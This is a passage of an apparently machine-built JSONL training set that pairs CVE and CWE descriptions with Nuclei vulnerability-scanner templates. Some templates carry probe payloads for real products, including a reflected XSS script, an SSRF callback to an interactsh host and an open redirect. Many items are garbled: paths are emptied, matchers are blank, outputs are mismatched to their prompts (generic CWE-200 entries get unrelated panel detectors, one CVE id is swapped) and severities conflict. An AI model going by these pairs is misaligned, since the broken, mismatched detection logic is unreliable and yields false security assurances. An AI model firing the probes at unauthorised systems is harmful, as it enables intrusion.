authentication.\nVulnerability Type: Path Traversal\nSeverity: critical\nAffected Products: buffalo wsr-2533dhpl2-bk_firmware, buffalo wsr-2533dhp3-bk_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-20091\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Configuration File Injection\n author: gy741,pdteam,parth\n severity: high\n description: The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.\n tags: cve2021,cve,buffalo,firmware,iot,tenable,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/Success.htm\" \n part: header\n - type: status\n status:\n - 302", "category": "cve", "severity": "critical", "id": "CVE-2021-20090"} {"instruction": "Generate a Nuclei template for CVE-2024-2667", "input": "Title: Unrestricted File Upload in instawp instawp_connect\nSummary: The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.\nVulnerability Type: Unrestricted File Upload\nSeverity: critical\nAffected Products: instawp instawp_connect\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-2667\n\ninfo:\n name: InstaWP Connect <= 0.1.0.22 - Unauthenticated Arbitrary File Upload\n author: DhiyaneshDK\n severity: critical\n description: The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.\n tags: cve,cve2024,wordpress,wp-plugin,wp,instawp-connect,intrusive,file-upload,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"status\":true\" \n - \"\"message\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2024-2667"} {"instruction": "Generate a Nuclei template for: Disbale Nginx Server Tokens", "input": "Title: Disbale Nginx Server Tokens\nSummary: Disbale Nginx Server Tokens. Detects if 'server_tokens' is enabled in Nginx, which can reveal version information.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: file-disable-nginx-server-tokens\n\ninfo:\n name: Disbale Nginx Server Tokens\n author: pussycat0x\n severity: medium\n description: Detects if 'server_tokens' is enabled in Nginx, which can reveal version information.\n tags: audit,nginx,file,hardening\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "file-disable-nginx-server-tokens"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: total-web-solutions-panel\n\ninfo:\n name: Total Web Solutions Panel - Detect\n author: dhiyaneshDK\n severity: info\n description: Total Web Solutions panel was detected.\n tags: panel,edb,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Total Web Solutions\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: trendnet-tew827dru-login\n\ninfo:\n name: TRENDnet TEW-827DRU Login Panel - Detect\n author: princechaddha\n severity: info\n description: TRENDnet TEW-827DRU login panel was detected.\n tags: panel,router,trendnet,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"var model = \"TEW-827DRU\";\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2023-48023", "input": "Title: Vulnerability (CWE-918) in anyscale ray\nSummary: Anyscale Ray 2.6.3 and 2.8.0 allows /log_proxy SSRF. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: critical\nAffected Products: anyscale ray\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-48023\n\ninfo:\n name: Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery\n author: cookiehanhoan,harryha\n severity: critical\n description: The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n tags: cve,cve2023,ssrf,ray,anyscale,Anyscale,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}\" \n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"

Interactsh Server

\" \n part: body", "category": "cve", "severity": "critical", "id": "CVE-2023-48023"} {"instruction": "Generate a Nuclei template for CVE-2013-0156", "input": "Title: Vulnerability (CWE-20) in rubyonrails rails and others\nSummary: active_support/core_ext/hash/conversions.rb in Ruby on Rails before 2.3.15, 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before 3.2.11 does not properly restrict casts of string values, which allows remote attackers to conduct object-injection attacks and execute arbitrary code, or cause a denial of service (memory and CPU consumption) involving nested XML entity references, by leveraging Action Pack support for (1) YAML type conversion or (2) Symbol type conversion.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: high\nAffected Products: rubyonrails rails, rubyonrails ruby_on_rails, debian debian_linux\nIndicators: error, vulnerability detected", "output": "id: infoblox-netmri-rails-cookie-rce\n\ninfo:\n name: Infoblox NetMRI < 7.6.1 - Remote Code Execution via Hardcoded Ruby Cookie Secret Key\n author: iamnoooob,pdresearch\n severity: critical\n description: Infoblox NetMRI virtual appliances before version 7.6.1 are vulnerable to remote code execution (RCE) due to the use of a hardcoded Ruby on Rails session cookie secret key. The Rails web component deserializes session cookies if the signing key is valid. Attackers with knowledge of this key can craft malicious session cookies that are deserialized by the application, leading to arbitrary code execution. This vulnerability is related to the known Ruby on Rails deserialization flaw (CVE-2013-0156). Infoblox did not assign a new CVE for this issue, as it is a result of the underlying Rails vulnerability.\n tags: infoblox,netmri,rails,rce,deserialization,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2013-0156"} {"instruction": "Generate a Nuclei template for CVE-2022-41473", "input": "Title: Cross-Site Scripting (XSS) in rpcms rpcms\nSummary: RPCMS v3.0.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Search function.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: rpcms rpcms\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-41473\n\ninfo:\n name: RPCMS 3.0.2 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2022,rpcms,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"rpcms\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-41473"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: hospital-management-panel\n\ninfo:\n name: Hospital Management System Login Panel - Detect\n author: arafatansari\n severity: info\n description: Hospital Management System login panel was detected.\n tags: panel,hms,cms,hospital_management_system_project,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.html\" \n matchers:\n - type: word\n words:\n - \"Hospital Management System\" \n - \"Doctors Login\" \n - \"Admin Login\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Softr.io Takeover Detection", "input": "Title: Softr.io Takeover Detection\nSummary: Softr.io Takeover Detection. Tags: takeover, softr, vuln\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: softr-takeover\n\ninfo:\n name: Softr.io Takeover Detection\n author: philippedelteil\n severity: high\n description: Softr.io Takeover Detection\n tags: takeover,softr,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: word\n words:\n - \"The application you were looking for was built on Softr\" \n - \"Get started with Softr\" \n condition: and\n - type: status\n status:\n - 404", "category": "generic", "severity": "high", "id": "softr-takeover"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: soup\n\ninfo:\n name: Soup User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Soup user name information check was conducted.\n tags: osint,osint-blog,soup,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.soup.io/author/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Author at Soup.io\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Blackbox Exporter Metrics Exposed", "input": "Title: Blackbox Exporter Metrics Exposed\nSummary: Blackbox Exporter Metrics Exposed. Tags: blackbox, exposure, debug\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: blackbox-exporter-metrics\n\ninfo:\n name: Blackbox Exporter Metrics Exposed\n author: DhiyaneshDk\n severity: info\n description: Blackbox Exporter Metrics Exposed\n tags: blackbox,exposure,debug,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/metrics\" \n matchers:\n - type: word\n words:\n - \"Blackbox exporter\" \n - \"blackbox_exporter_build_info\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "blackbox-exporter-metrics"} {"instruction": "Generate a Nuclei template for: Max Mega Menu Detection", "input": "Title: Max Mega Menu Detection\nSummary: Max Mega Menu Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-megamenu\n\ninfo:\n name: Max Mega Menu Detection\n author: ricardomaia\n severity: info\n description: Max Mega Menu Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/megamenu/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-megamenu"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: hackerearth\n\ninfo:\n name: Hackerearth User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Hackerearth user name information check was conducted.\n tags: osint,osint-coding,hackerearth,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.hackerearth.com/@{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"| Developer Profile on HackerEarth\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Discover wp-app.log Files", "input": "Title: Discover wp-app.log Files\nSummary: Discover wp-app.log Files. wp-app.log file is exposed.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wp-app-log\n\ninfo:\n name: Discover wp-app.log Files\n author: geeknik\n severity: info\n description: wp-app.log file is exposed.\n tags: exposure,logs,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-app.log\" \n matchers:\n - type: word\n words:\n - \"LANG\" \n - \"Array\" \n condition: and\n - type: word\n words:\n - \"text/html\" \n - \"application/javascript\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "wp-app-log"} {"instruction": "Generate a Nuclei template for CVE-2021-24210", "input": "Title: Vulnerability (CWE-601) in kiboit phastpress\nSummary: There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only go to whitelisted pages but it's possible to redirect the victim to any domain.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: kiboit phastpress\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24210\n\ninfo:\n name: WordPress PhastPress <1.111 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve2021,cve,redirect,wpscan,wordpress,kiboit,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2021-24210"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Crisp Client", "input": "Title: Content-Security-Policy Bypass - Crisp Client\nSummary: Content-Security-Policy Bypass - Crisp Client. Tags: xss, csp-bypass, crisp-client\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: crisp-client-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Crisp Client\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Crisp Client\n tags: xss,csp-bypass,crisp-client,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"crisp.chat\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "crisp-client-csp-bypass"} {"instruction": "Generate a Nuclei template for: Loxone WebInterface Panel - Detect", "input": "Title: Loxone WebInterface Panel - Detect\nSummary: Loxone WebInterface Panel - Detect. Tags: panel, login, loxone\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: loxone-web-panel\n\ninfo:\n name: Loxone WebInterface Panel - Detect\n author: DhiyaneshDk\n severity: info\n description: Loxone WebInterface Panel - Detect\n tags: panel,login,loxone,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Webinterface\" \n - \"loxone\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "loxone-web-panel"} {"instruction": "Generate a Nuclei template for: CSV Injection Detection", "input": "Title: CSV Injection Detection\nSummary: CSV Injection Detection. A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: csv-injection\n\ninfo:\n name: CSV Injection Detection\n author: DhiyaneshDK,ritikchaddha\n severity: medium\n description: A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications.\n tags: dast,csv,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: word\n words:\n - \"text/csv\" \n - \"application/csv\" \n - \"application/vnd.ms-excel\" \n part: header", "category": "generic", "severity": "medium", "id": "csv-injection"} {"instruction": "Generate a Nuclei template for: Lucee < 6.0.1.59 - Remote Code Execution", "input": "Title: Lucee < 6.0.1.59 - Remote Code Execution\nSummary: Lucee < 6.0.1.59 - Remote Code Execution. Tags: lucee, rce, oast\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: lucee-rce\n\ninfo:\n name: Lucee < 6.0.1.59 - Remote Code Execution\n author: rootxharsh,iamnoooob,pdresearch\n severity: critical\n description: Lucee < 6.0.1.59 - Remote Code Execution\n tags: lucee,rce,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "critical", "id": "lucee-rce"} {"instruction": "Generate a Nuclei template for CVE-2023-1020", "input": "Title: Unknown Vulnerability in wp_live_chat_shoutbox_project wp_live_chat_shoutbox\nSummary: The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: wp_live_chat_shoutbox_project wp_live_chat_shoutbox\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-1020\n\ninfo:\n name: Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection\n author: theamanrawat\n severity: critical\n description: The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"c8c605999f3d8352d7bb792cf3fdb25b\" \n - \"no_participation\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2023-1020"} {"instruction": "Generate a Nuclei template for CVE-2021-25296", "input": "Title: Unknown Vulnerability in nagios nagios_xi\nSummary: Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: nagios nagios_xi\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-25296\n\ninfo:\n name: Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection\n author: k0pak4\n severity: high\n description: Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"Event Log\" \n - \"Display Name\" \n part: body_4\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2021-25296"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: panos-management-panel\n\ninfo:\n name: PAN-OS Management Panel - Detect\n author: bhutch\n severity: info\n description: PAN-OS management panel was detected.\n tags: panel,panos,login,detect,paloaltonetworks,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/php/login.php\" \n matchers:\n - type: word\n words:\n - \"Login\" \n - \"PAN_FORM_CONTENT\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: allied-telesis-login\n\ninfo:\n name: Allied Telesis Device GUI Login Panel - Detect\n author: prajiteshsingh\n severity: info\n description: Allied Telesis Device GUI login panel was detected.\n tags: panel,allied,allied_telesis,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/public/login.html\" \n matchers:\n - type: word\n words:\n - \"Allied Telesis Device GUI\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2019-20141", "input": "Title: Cross-Site Scripting (XSS) in laborator neon\nSummary: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: laborator neon\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-20141\n\ninfo:\n name: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting\n author: knassar702\n severity: medium\n description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.\n tags: cve2019,cve,xss,laborator,wordpress,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/data/autosuggest-remote.php?q=\">\" \n - \"{{BaseURL}}/admin/data/autosuggest-remote.php?q=\">\" \n matchers:\n - type: word\n words:\n - \">>)1(trela=rorreno\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header", "category": "cve", "severity": "medium", "id": "CVE-2019-20141"} {"instruction": "Generate a Nuclei template for: AutoLogon Enabled", "input": "Title: AutoLogon Enabled\nSummary: AutoLogon Enabled. Checks if automatic logon is enabled, allowing users to bypass login prompts.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: auto-logon-enabled\n\ninfo:\n name: AutoLogon Enabled\n author: princechaddha\n severity: medium\n description: Checks if automatic logon is enabled, allowing users to bypass login prompts.\n tags: autologon,login,code,windows-audit\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "auto-logon-enabled"} {"instruction": "Generate a Nuclei template for: Account Lockout Threshold Check", "input": "Title: Account Lockout Threshold Check\nSummary: Account Lockout Threshold Check. Ensure the account lockout threshold is configured to 5 or fewer invalid login attempts to reduce the risk of brute-force attacks.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: account-lockout-threshold\n\ninfo:\n name: Account Lockout Threshold Check\n author: nukunga[SungHyunJeon]\n severity: medium\n description: Ensure the account lockout threshold is configured to 5 or fewer invalid login attempts to reduce the risk of brute-force attacks.\n tags: account-management,code,windows-audit,kisa\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "account-lockout-threshold"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: udemy\n\ninfo:\n name: Udemy User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Udemy user name information check was conducted.\n tags: osint,osint-tech,udemy,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.udemy.com/user/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"| Udemy\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2025-27892", "input": "Title: SQL Injection in shopware shopware\nSummary: Shopware prior to version 6.5.8.13 is affected by a SQL injection vulnerability in the /api/search/order endpoint. NOTE: this issue exists because of a CVE-2024-22406 and CVE-2024-42357 regression.\nVulnerability Type: SQL Injection\nSeverity: medium\nAffected Products: shopware shopware\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-27892\n\ninfo:\n name: Shopware < 6.5.8.13 - SQL Injection\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the \"aggregations\" object. The name field in this \"aggregations\" in nested object is vulnerable SQL-injection and can be exploited using SQL parameters.\n tags: cve,cve2025,shopware,sqli,time-based-sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2025-27892"} {"instruction": "Generate a Nuclei template for CVE-2000-0760", "input": "Title: Unknown Vulnerability in apache tomcat\nSummary: The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: apache tomcat\nIndicators: error, vulnerability detected", "output": "id: tomcat-snoop-servlet-exposed\n\ninfo:\n name: Apache Tomcat - Snoop Servlet Information Disclosure\n author: Thabisocn\n severity: info\n description: The Snoop servlet is exposed in the Apache Tomcat examples directory.\n tags: apache,jakarta,tomcat,exposure,info-leak,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/examples/jsp/snp/snoop.jsp\" \n matchers:\n - type: word\n words:\n - \"Request Information\" \n - \"Path info\" \n - \"Server name\" \n - \"Remote address\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2000-0760"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: kibana-panel\n\ninfo:\n name: Kibana Login Panel - Detect\n author: petruknisme,daffainfo,c-sh0\n severity: info\n description: Kibana login panel was detected.\n tags: panel,kibana,elastic,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/login\" \n - \"{{BaseURL}}/app/kibana\" \n matchers:\n - type: word\n words:\n - \"Kibana\" \n - \"Elastic\" \n - \"Kibana Login\" \n part: body\n condition: or\n - type: regex\n part: header", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-40881", "input": "Title: Vulnerability (CWE-77) in contec solarview_compact_firmware\nSummary: SolarView Compact 